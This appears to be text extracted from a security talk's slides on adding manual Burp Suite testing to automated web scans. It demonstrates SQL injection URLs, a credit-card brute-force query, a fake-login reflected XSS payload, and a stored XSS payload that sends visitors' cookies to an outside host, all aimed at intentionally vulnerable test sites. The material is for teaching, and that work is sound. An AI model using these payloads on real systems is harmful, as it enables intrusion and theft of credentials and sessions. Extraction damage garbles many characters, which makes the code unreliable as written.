Adding Value to Automated Web Scans. Burp Suite and Beyond

Adding Value to Automated Web Scans Burp Suite and Beyond

Automated Scanning vs Manual Tes;ng Manual Tes;ng Tools/Suites At MSU - QualysGuard WAS & Burp Suite Automated Scanning - iden;fy acack surface accross organiza;on Manual Tes;ng - proxy tools used to verify scan results and find what automated scans miss Both necessary in a large enviroment

Automated Scanning vs Manual Tes;ng Strengths of Automated Scanners: Scheduling Repor;ng Scalability Strengths of Manual Scanners: Proxy based - allows intercep;on of requests Customize payloads for vulnerability detec;on Verify findings from automated scan results.

Automated Scanning vs Manual Tes;ng Weaknesses of automated scanners: increased poten;al for false posi;ves duplicate findings code coverage not as thourough Weaknesses of manual scanning: tester needs knowledge of applica;on for best results learning curve (developers already stretched thin) not scalable (e.g. distribu;ng reports is very ;me consuming)

Methodology Reconnaissance Spider target Hidden Files Google site search End result is a comprehensive map of site Discovery Automated Scanning Manual Detec;on and Analysis Exploit Automated Exploit tools - sqlmap, havij, metasploit Burp Suite - hands- on tes=ng 5

Road Map Spider and vulnerability scan already performed Leverage Burp tools to expand upon proof of concepts from scan results Carry out actual acack scenarios 6

Tools for this Demo BurpSuite Firefox FoxyProxy addon Firebug addon Target: *.vulnweb.com (inten;onally vulnerable websites from Acune;x)

Scan Results Vulnerabilty reports - proof of concept (POC) include request payload and applica;on response POCs are not intui;ve, o\en met with doubt Need to be able to drive home the real risk

Scan Report - XSS example

Scan Report - SQLi Example

SQL Injec;on Boolean Based SQLi (Blind SQL Injec;on) Blind SQLi is possible if applica;on will respond to true and false condi;ons in a detectable manner* hcp://testphp.vulnweb.com/listproducts.php?ar;st=1 and 1=1 //true condi;on hcp://testphp.vulnweb.com/listproducts.php?ar;st=1 and 1=2 //false condi;on ` *Differences between true and false responses could be subtle. The comparer tool highlights the differences between two responses Error Based SQLi Possible if applica;on echos database errors to browser. Errors to reveal informa;on about database that serve as clues for building an acack. 11

Demo - SQLi A BeBer Blind SQLi Proof of Concept hcp://testphp.vulnweb.com/listproducts.php?ar;st=1 and substring(@@version, 1,1)=4 and 1=1 // false hcp://testphp.vulnweb.com/listproducts.php?ar;st=1 and substring(@@version, 1,1)=5 and 1=1 //true

SQLi Exploit Example A BeBer Error Based SQLi POC testphp.vulnweb.com/listproducts.php?ar=st=1' - error vulnweb.com/listproducts.php?ar=st=1 union all select 1,2,3,4,5,6,7,8,9,10 - error vulnweb.com/listproducts.php?ar=st=1 union all select 1,2,3,4,5,6,7,8,9,10,11 - no error! vulnweb.com/listproducts.php?ar=st=1 union all select 1,2,3,4,5,6,7,8,9,10,11 from users - no error!

Cross Site Scrip;ng XSS type 0 - DOM Based acack string embedded in URL and not processed by the server. Executed in the DOM client- side (very much like reflected) XSS type 1 Reflected acack string is submiced with request (usually in URL) and the server embeds the string in the HTML of the response *DOM based and reflected depend on social engineering to succeed XSS type 2 - Persistent (stored) XSS the applica;on stores the acack string so that it is presented in future responses 14

Reflected XSS Demo Target: hcp://testasp.vulnweb.com/search.asp?msearch= Goal: modify page to look like login Payload: /Search.asp?mSearch= <script>document.getelementsbyclassname('framedform').item(0).innerhtml = "password <div ><input type='password' id='pw' /><input type='bucon' onclick='alert(pw.value)' value='login' /></div>"; document.getelementsbyclassname('path').item(0).innerhtml = '';</script> *Requires social engineering. Obfuscate the query string to hide script

Same Origin Policy Same Origin Policy - SOP allows you to make requests to pages within the same site/domain, while preven;ng you from making requests to pages on a different domain. Without SOP the internet would be very unsafe. Visit my evil site and I can direct your browser to acack any site I want. Goal of XSS acack is to subvert SOP to exfiltrate informa;on

Bypassing SOP Image source You are allowed to include images with source outside of the applica;on's domain <img src= evildomain.com? id= /> the src is an HTTP GET request Example XSS <div onmouseover= xssscript() ><img id='evil' src='evildomain.com?id=' size='1px' /></div> <script> func;on xssscript( ){..}</script></div> 17

Persistent XSS Demo Target: hcp://testphp.vulnweb.com/guestbook.php Goal: Inject javascript and image to bypass SOP Objec=ve is to send cookie to my evil site: www.montana.edu/hardin/ cookiejar.php?d={cookie}

Persistent XSS Demo Payload: Hello<div onmouseover=addsource() style= width:100% > <img size='1px' id='badimg' /></div> there <script> func;on addsource(){ document.getelementbyid("badimg").src = "hcp:// www.montana.edu/hardin/cookiejar.php?d="+document.cookie; } </script>

SOP has been subverted!!!

Ques;ons hardin@montana.edu

SQLi Exploit Example Goal: Use Intruder to brute force the value of the credit card field 1. Set proxy to intercept 2. Submit request in browser hcp://testphp.vulnweb.com/ar;sts.php?ar;st=1 and (select substring(cc,1,1)= 1 from users limit 0,1)=1 3. Send intercepted request to Intruder tool 4. Indicate posi=on(s) to be injected hcp://testphp.vulnweb.com/ar;sts.php?ar;st=1 and (select substring(cc,1,1)= 1 from users limit 0,1)=1 5. Define the payloads 6. Start ABack